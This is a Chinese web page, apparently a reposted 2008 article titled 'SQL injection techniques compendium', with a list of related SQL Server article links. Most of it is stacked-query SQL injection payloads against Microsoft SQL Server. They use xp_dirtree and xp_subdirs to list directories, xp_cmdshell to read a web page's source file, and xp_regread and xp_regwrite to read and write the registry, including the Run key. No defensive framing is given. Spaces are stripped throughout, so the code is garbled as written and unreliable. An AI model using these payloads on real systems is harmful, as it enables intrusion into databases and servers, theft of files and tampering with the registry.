SQL注入技巧资料大全
2008-10-27 16:51:24 来源:WEB开发网12.(1)遍历目录
;createtabledirs(pathsvarchar(100),idint)
;insertdirsexecmaster.dbo.xp_dirtree'c:'
;and(selecttop1pathsfromdirs)>0
;and(selecttop1pathsfromdirswherepathsnot
in('上步得到的paths'))>)
(2)遍历目录
;createtabletemp(idnvarchar(255),num1nvarchar(255),num2nvarchar(255),num3nvarchar(255));--
;inserttempexecmaster.dbo.xp_availablemedia;--获得当前所有驱动器
;insertintotemp(id)execmaster.dbo.xp_subdirs'c:';--获得子目录列表
;insertintotemp(id,num1)execmaster.dbo.xp_dirtree'c:';--获得所有子目录的目录树结构
;insertintotemp(id)execmaster.dbo.xp_cmdshell'typec:webindex.asp';--查看文件的内容
13.mssql中的存储过程
xp_regenumvalues注册表根键,子键
;execxp_regenumvalues'HKEY_LOCAL_MACHINE',
'SOFTWAREMicrosoftWindowsCurrentVersionRun'以多个记录集方式返回所有键值
xp_regread根键,子键,键值名
;execxp_regread'HKEY_LOCAL_MACHINE',
'SOFTWAREMicrosoftWindowsCurrentVersion',
'CommonFilesDir'返回制定键的值
xp_regwrite根键,子键,值名,值类型,值
值类型有2种REG_SZ表示字符型,REG_DWORD表示整型
;execxp_regwrite'HKEY_LOCAL_MACHINE',
'SOFTWAREMicrosoftWindowsCurrentVersion',
'TestValueName','reg_sz','hello'写入注册表
xp_regdeletevalue根键,子键,值名
- ››sql server自动生成批量执行SQL脚本的批处理
- ››sql server 2008亿万数据性能优化
- ››SQL Server 2008清空数据库日志方法
- ››sqlserver安装和简单的使用
- ››SQL Sever 2008 R2 数据库管理
- ››SQL SERVER无法安装成功,sqlstp.log文件提示[未发...
- ››Sql Server中通过父记录查找出所有关联的子记录
- ››SqlServer触发器、存储过程和函数
- ››SQL Server 中的事务(含义,属性,管理)
- ››Sqlite数据库插入和读取图片数据
- ››Sql server 2005拒绝了对对象 'xx表' (数...
- ››Sql server 2005拒绝了对对象 'xx表' (数...
中查找“SQL注入技巧资料大全”更多相关内容
中查找“SQL注入技巧资料大全”更多相关内容更多精彩
赞助商链接
